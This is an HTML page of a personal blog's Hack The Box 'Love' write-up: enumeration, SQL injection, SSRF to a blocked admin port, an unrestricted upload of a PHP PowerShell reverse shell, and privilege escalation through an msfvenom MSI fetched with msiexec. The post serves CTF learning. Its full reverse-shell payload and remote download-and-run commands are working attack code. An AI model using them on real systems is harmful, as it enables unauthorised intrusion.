<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>HTB: Love Writeup - Alex Loney</title>
<meta name="description" content="There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!">


  <meta name="author" content="Alex Loney">
  
  <meta property="article:author" content="Alex Loney">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Alex Loney">
<meta property="og:title" content="HTB: Love Writeup">
<meta property="og:url" content="/blog/writeup/htb/htb-love/">


  <meta property="og:description" content="There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!">







  <meta property="article:published_time" content="2021-06-11T23:13:00-07:00">






<link rel="canonical" href="/blog/writeup/htb/htb-love/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": null,
      "url": "/"
    
  }
</script>







<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Alex Loney Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

  </head>

  <body class="layout--single">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
        <a class="site-title" href="/">
          Alex Loney
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a href="/posts/">Posts</a>
            </li><li class="masthead__menu-item">
              <a href="/categories/">Categories</a>
            </li><li class="masthead__menu-item">
              <a href="/tags/">Tags</a>
            </li><li class="masthead__menu-item">
              <a href="/about/">About</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="/">
        <img src="/assets/images/bio-photo.jpg" alt="Alex Loney" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="/" itemprop="url">Alex Loney</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Software Engineer by trade and passion, everything else by curiosity</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      

      
        
          
            <li><a href="https://alexloney.com" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fas fa-fw fa-link" aria-hidden="true"></i><span class="label">Website</span></a></li>
          
        
          
            <li><a href="https://github.com/alexloney" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="HTB: Love Writeup">
    <meta itemprop="description" content="There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!">
    <meta itemprop="datePublished" content="2021-06-11T23:13:00-07:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="/blog/writeup/htb/htb-love/" class="u-url" itemprop="url">HTB: Love Writeup
</a>
          </h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!</p>

<hr />

<h1 id="enumeration">Enumeration</h1>
<p>I began by the standard enumeration flow, using <code class="language-plaintext highlighter-rouge">nmap</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.91 scan initiated Wed Jun  9 13:19:10 2021 as: nmap -sC -sV -oA nmap/love 10.10.10.239</span>
Nmap scan report <span class="k">for </span>10.10.10.239
Host is up <span class="o">(</span>0.26s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 <span class="o">((</span>Win64<span class="o">)</span> OpenSSL/1.1.1j PHP/7.3.27<span class="o">)</span>
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 <span class="o">(</span>OpenSSL/1.1.1j PHP/7.3.27<span class="o">)</span>
...<span class="o">{</span>snip<span class="o">}</span>...
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>staging.love.htb/organizationName<span class="o">=</span>ValentineCorp/stateOrProvinceName<span class="o">=</span>m/countryName<span class="o">=</span><span class="k">in</span>
...<span class="o">{</span>snip<span class="o">}</span>...
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 <span class="o">(</span>OpenSSL/1.1.1j PHP/7.3.27<span class="o">)</span>

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Wed Jun  9 13:21:32 2021 -- 1 IP address (1 host up) scanned in 142.98 seconds</span>
</code></pre></div></div>

<p>So, there are a few interesting things that may be seen. Visiting port <code class="language-plaintext highlighter-rouge">80</code> shows a voting system, port <code class="language-plaintext highlighter-rouge">5000</code> just shows an Access Denied page, and the SSL certificate from port <code class="language-plaintext highlighter-rouge">443</code> shows a different name (<code class="language-plaintext highlighter-rouge">staging.love.htb</code>).</p>

<h2 id="voting-system-port-80">Voting System (port 80)</h2>
<p>I spent a while on this, the first thing I noticed is that the <code class="language-plaintext highlighter-rouge">voter</code> field is vulnerable to a timing SQL injection, using <code class="language-plaintext highlighter-rouge">sqlmap</code> I was able to pull the following credentials from it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>admin:$2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC
</code></pre></div></div>

<p>Unfortunately, throwing that hash into JTR and Hashcat reveals nothing, so that appears to be a deadend.</p>

<p>Continuing with the voting system enumeration, <code class="language-plaintext highlighter-rouge">gobuster</code> reveals that there are multiple directories with listings open and other additonal directories.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/admin
/includes
/images
</code></pre></div></div>

<p>Those both could be interesting, but lets check out the other ports</p>

<h2 id="file-scanning-staginglovehtb">File Scanning (staging.love.htb)</h2>
<p>Adding <code class="language-plaintext highlighter-rouge">10.10.10.239 staging.love.htb</code> to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file, I’m able to access this new site. It has a notification system (that doesn’t do anything) and a demo file scan. The demo file scan will download and display a file that you give it.</p>

<h2 id="forbidden-port-5000">Forbidden (port 5000)</h2>
<p>There’s another HTTP instance running on port 5000, but whenever visiting this page or attempting to access any subdirectories from it, I simply receive a <code class="language-plaintext highlighter-rouge">403 Forbidden</code> error.</p>

<h3 id="accessing-forbidden">Accessing Forbidden</h3>
<p>This part took me a long time to figure out, longer than it likely should have, but if you use the file scanner from <code class="language-plaintext highlighter-rouge">staging.love.htb</code> to scan <code class="language-plaintext highlighter-rouge">127.0.0.1:5000</code>, it can access the page! It’ll return</p>

<blockquote>
  <p>Vote Admin Creds admin: @LoveIsInTheAir!!!!</p>
</blockquote>

<h2 id="vote-login">Vote Login</h2>
<p>Given the previous credentials pulled fromt he forbitten page, I was then able to access the admin page located at <code class="language-plaintext highlighter-rouge">love.htb/admin</code> using the credentials <code class="language-plaintext highlighter-rouge">admin:@LoveIsInTheAir!!!!</code>!</p>

<h2 id="getting-a-shell">Getting a Shell</h2>
<p>Now that I have admin login, it’s time to look around. I immediately notice that I can create a user and upload a photo. I wonder if there’s any validate that this is a valid photo?</p>

<p>Since this is a PHP website running on a Windows machine (all stuff I know from the nmap scan and the file extensions in the URL), I crafted a PHP PowerShell reverse shell payload:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>

<span class="nb">exec</span><span class="p">(</span><span class="s2">"powershell -c </span><span class="se">\"\$</span><span class="s2">client = New-Object System.Net.Sockets.TCPClient('10.10.14.204',9000);</span><span class="se">\$</span><span class="s2">stream = </span><span class="se">\$</span><span class="s2">client.GetStream();[byte[]]</span><span class="se">\$</span><span class="s2">bytes = 0..65535|%</span><span class="si">{</span><span class="nv">0</span><span class="si">}</span><span class="s2">;while((</span><span class="se">\$</span><span class="s2">i = </span><span class="se">\$</span><span class="s2">stream.Read(</span><span class="se">\$</span><span class="s2">bytes, 0, </span><span class="se">\$</span><span class="s2">bytes.Length)) -ne 0){;</span><span class="se">\$</span><span class="s2">data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(</span><span class="se">\$</span><span class="s2">bytes,0, </span><span class="se">\$</span><span class="s2">i);</span><span class="se">\$</span><span class="s2">sendback = (iex </span><span class="se">\$</span><span class="s2">data 2&gt;&amp;1 | Out-String );</span><span class="se">\$</span><span class="s2">sendback2 = </span><span class="se">\$</span><span class="s2">sendback + 'PS ' + (pwd).Path + '&gt; ';</span><span class="se">\$</span><span class="s2">sendbyte = ([text.encoding]::ASCII).GetBytes(</span><span class="se">\$</span><span class="s2">sendback2);</span><span class="se">\$</span><span class="s2">stream.Write(</span><span class="se">\$</span><span class="s2">sendbyte,0,</span><span class="se">\$</span><span class="s2">sendbyte.Length);</span><span class="se">\$</span><span class="s2">stream.Flush();}</span><span class="se">\$</span><span class="s2">client.Close()</span><span class="se">\"</span><span class="s2">"</span><span class="p">);</span>
</code></pre></div></div>

<p>I then started a reverse shell</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 9000
</code></pre></div></div>

<p>And uploaded this PHP file as an image. And it worked, no validate on the type of file being uploaded at all!!</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\o</span>mrs<span class="se">\i</span>mages&gt; <span class="nb">whoami
</span>love<span class="se">\p</span>hoebe
</code></pre></div></div>

<h1 id="privesc">Privesc</h1>
<p>Now that I have a low level shell, it’s time to begin enumeration again to determine how to move to a system shell. After checking a few of the standard enumeration paths, I noticed the following:</p>

<div class="language-batch highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">PS</span> <span class="kd">C</span>:\xampp\htdocs\omrs\images&gt; <span class="nb">reg</span> <span class="nb">query</span> <span class="kd">HKEY_CURRENT_USER</span>\Software\Policies\Microsoft\Windows\Installer

<span class="kd">HKEY_CURRENT_USER</span>\Software\Policies\Microsoft\Windows\Installer
    <span class="kd">AlwaysInstallElevated</span>    <span class="kd">REG_DWORD</span>    <span class="mh">0x1</span>

<span class="kd">PS</span> <span class="kd">C</span>:\xampp\htdocs\omrs\images&gt; <span class="nb">reg</span> <span class="nb">query</span> <span class="kd">HKEY_LOCAL_MACHINE</span>\Software\Policies\Microsoft\Windows\Installer

<span class="kd">HKEY_LOCAL_MACHINE</span>\Software\Policies\Microsoft\Windows\Installer
    <span class="kd">AlwaysInstallElevated</span>    <span class="kd">REG_DWORD</span>    <span class="mh">0x1</span>
</code></pre></div></div>

<p>Because those (either one) are set to true, that means that any user is able to execute a <code class="language-plaintext highlighter-rouge">.msi</code> as system! So I then crafted an MSI payload:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>msfvenom <span class="nt">-p</span> windows/meterpreter/reverse_tcp <span class="nv">lhost</span><span class="o">=</span>10.10.14.204 <span class="nv">lport</span><span class="o">=</span>1234 <span class="nt">-f</span> msi <span class="o">&gt;</span> rshell1234.msi
<span class="o">[</span>-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
<span class="o">[</span>-] No <span class="nb">arch </span>selected, selecting <span class="nb">arch</span>: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes

<span class="nv">$ </span><span class="nb">sudo </span>python3 <span class="nt">-m</span> http.server 80
Serving HTTP on 0.0.0.0 port 80 <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ...
</code></pre></div></div>

<p>Back on Windows I executed the installer</p>

<div class="language-batch highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> <span class="nb">msiexec</span> <span class="na">/q /i </span><span class="kd">http</span>://10.10.14.204/rshell1234.msi
</code></pre></div></div>

<p>And on my machine I had a metasploit listener set up</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>msfconsole <span class="nt">-q</span> <span class="nt">-x</span> <span class="s2">"use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.14.204; set lport 1234; run"</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Using configured payload generic/shell_reverse_tcp
payload <span class="o">=&gt;</span> windows/meterpreter/reverse_tcp
lhost <span class="o">=&gt;</span> 10.10.14.204
lport <span class="o">=&gt;</span> 1234
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Started reverse TCP handler on 10.10.14.204:1234 
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Sending stage <span class="o">(</span>175174 bytes<span class="o">)</span> to 10.10.10.239
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Meterpreter session 1 opened <span class="o">(</span>10.10.14.204:1234 -&gt; 10.10.10.239:62952<span class="o">)</span> at 2021-06-10 20:59:28 <span class="nt">-0400</span>

meterpreter <span class="o">&gt;</span> shell
Process 7128 created.
Channel 1 created.
Microsoft Windows <span class="o">[</span>Version 10.0.19042.867]
<span class="o">(</span>c<span class="o">)</span> 2020 Microsoft Corporation. All rights reserved.

C:<span class="se">\W</span>INDOWS<span class="se">\s</span>ystem32&gt;whoami
<span class="nb">whoami
</span>nt authority<span class="se">\s</span>ystem

C:<span class="se">\W</span>INDOWS<span class="se">\s</span>ystem32&gt;
</code></pre></div></div>

<p>And success! We now have a system shell!!</p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#htb" class="page__taxonomy-item p-category" rel="tag">htb</a><span class="sep">, </span>
    
      <a href="/tags/#htb-easy" class="page__taxonomy-item p-category" rel="tag">htb easy</a><span class="sep">, </span>
    
      <a href="/tags/#offsec" class="page__taxonomy-item p-category" rel="tag">offsec</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#blog" class="page__taxonomy-item p-category" rel="tag">blog</a><span class="sep">, </span>
    
      <a href="/categories/#htb" class="page__taxonomy-item p-category" rel="tag">htb</a><span class="sep">, </span>
    
      <a href="/categories/#writeup" class="page__taxonomy-item p-category" rel="tag">writeup</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2021-06-11T23:13:00-07:00">June 11, 2021</time></p>

      </footer>

      <section class="page__share">
  

  <a href="https://twitter.com/intent/tweet?text=HTB%3A+Love+Writeup%20%2Fblog%2Fwriteup%2Fhtb%2Fhtb-love%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=%2Fblog%2Fwriteup%2Fhtb%2Fhtb-love%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=%2Fblog%2Fwriteup%2Fhtb%2Fhtb-love%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/blog/writeup/htb/htb-armageddon/" class="pagination--pager" title="HTB: Armageddon Writeup
">Previous</a>
    
    
      <a href="/blog/writeup/htb/htb-tenet/" class="pagination--pager" title="HTB: Tenet Writeup
">Next</a>
    
  </nav>

    </div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">You May Also Enjoy</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-trick/" rel="permalink">HTB: Trick Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Trick. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-dynstr/" rel="permalink">HTB: Dynstr Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-knife/" rel="permalink">HTB: Knife Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/blog/writeup/htb/htb-tenet/" rel="permalink">HTB: Tenet Writeup
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    

    
      
        
          <li><a href="https://github.com/alexloney" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    

    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2022 Alex Loney. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>







  </body>
</html>
